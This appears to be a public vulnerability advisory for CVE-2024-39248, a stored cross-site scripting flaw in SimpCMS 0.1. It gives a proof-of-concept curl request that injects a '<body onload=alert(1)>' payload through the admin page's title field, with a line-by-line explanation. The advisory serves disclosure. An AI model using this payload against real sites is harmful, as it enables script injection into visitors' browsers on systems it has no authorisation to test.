SimpCMS version 0.1 suffers from a cross site scripting vulnerability.
advisories | CVE-2024-39248
# Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)
# Date: 26-06-2024
# CVE: CVE-2024-39248
# Exploit Author: Jason Jacobs (0xjason_jacobs)
# Vendor Homepage: https://sourceforge.net/projects/simpcms/
# Software Link: https://sourceforge.net/projects/simpcms/
# Category: Web Application
# Version: 0.1
# Vulnerable endpoint: /SimpCMS/admin.php
Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Explanation:
- curl: The command-line tool for transferring data with URLs.
- -X POST: Specifies the request method to use (POST).
- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.
- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.
Run this command in your terminal to send the POST request with the XSS payload.
Visit the /SimpCMS main site and the XSS will be visible.
